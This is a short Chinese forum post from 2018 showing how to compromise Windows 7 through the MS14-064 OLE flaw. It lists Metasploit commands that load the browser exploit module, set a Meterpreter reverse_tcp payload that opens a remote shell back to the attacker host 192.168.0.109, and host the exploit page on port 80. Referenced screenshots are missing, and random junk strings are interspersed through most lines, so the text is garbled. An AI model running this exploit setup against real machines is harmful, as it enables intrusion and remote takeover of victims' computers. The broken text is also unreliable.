找回密码
 立即注册
查看: 2050|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' U5 a6 u; \( Z$ T& ?% r0 X 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 5 |: ^6 ]5 o+ z6 o6 {4 x9 v

5 S* j" d. P) c1 Z9 K

$ k; b3 y6 p' c. d0 s3 e 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ( _4 b$ V @/ k" S& |

: { c, w) o0 w# T7 C q& j

, m8 y1 a3 v6 o% m, E$ E 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp8 B( u$ l7 h0 K$ B; z1 ^

6 L$ L& g3 ^0 D# [

& Y, F1 b- ]% I' T8 `             set AllowPowershellPrompt true ! E# l+ c; P) r8 @. y' o

. J' @) Y" r# }) f8 J

8 n$ w4 U# g6 M             Set LHOST 192.168.0.109 2 u1 n- Z- V' V( Y% G

4 E! W" w7 h! q6 T+ }

1 V; z+ x$ G( ~2 F: z6 C             set SRVHOST 192.168.0.109/ I/ J0 d6 h% }# D

/ _- m% @: I1 t( f8 K# z) x

' z2 A# i) a2 E4 X' |             Set uripath share : i6 |9 N: l7 ]/ t4 e

6 H4 v4 m7 H# b# V. ]1 U

. R6 v* ]2 _$ F: ~/ O# M             Set srvport 80 % _4 h/ q. K6 r# Q/ W6 N

7 i( _9 y8 x( L. d/ ?( g# b. ?

3 l6 U( x2 K% _. m2 y, z   ' _5 z# O' O9 ?! r

1 g `4 i5 w$ N4 r/ D

$ {9 h( e( i$ W* g, ]6 i1 q   + ^& y6 }) w; @8 @) N) T1 Y

2 B" ?' S) C% q1 u* h! ^3 w2 \9 z- ^

* B# a; G" ^9 y$ M0 l( a' `$ N5 [' D5 C   ; ~% ]+ |8 h; f l$ z2 ?" i

; r; x! M( q O2 s$ [8 v

; I7 Q/ j0 @9 v4 w: A m  ! m/ }7 D& S% h" W) U

* V1 a8 d3 K$ q' Z3 X

" [! R9 f+ S" i- q: N   + i$ k7 f* [: s" ^, o, n

1 e4 g' q" U) y/ `& d

1 Q9 J# I, w7 z6 B( u 下面我们来访问本地地址如图:; P1 {9 q9 \6 h9 o+ p' W

. Y1 \- z+ t" z& D/ ]

% F& q4 g, }% ?, V" u; }  9 ^& ~5 H5 \/ x' v6 I5 V, z

+ a6 l+ a+ [2 a- M) A# R

# s1 v- y! J9 Y. T+ B6 }! j, l  7 z) Z5 b3 o( R( j3 O

) T! q/ r8 D$ H7 f& u' H# r ^

$ f' o% ?, I# ~6 B- ~* j7 f 6 L) ?8 O8 _8 o. |6 E( l6 T: u

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表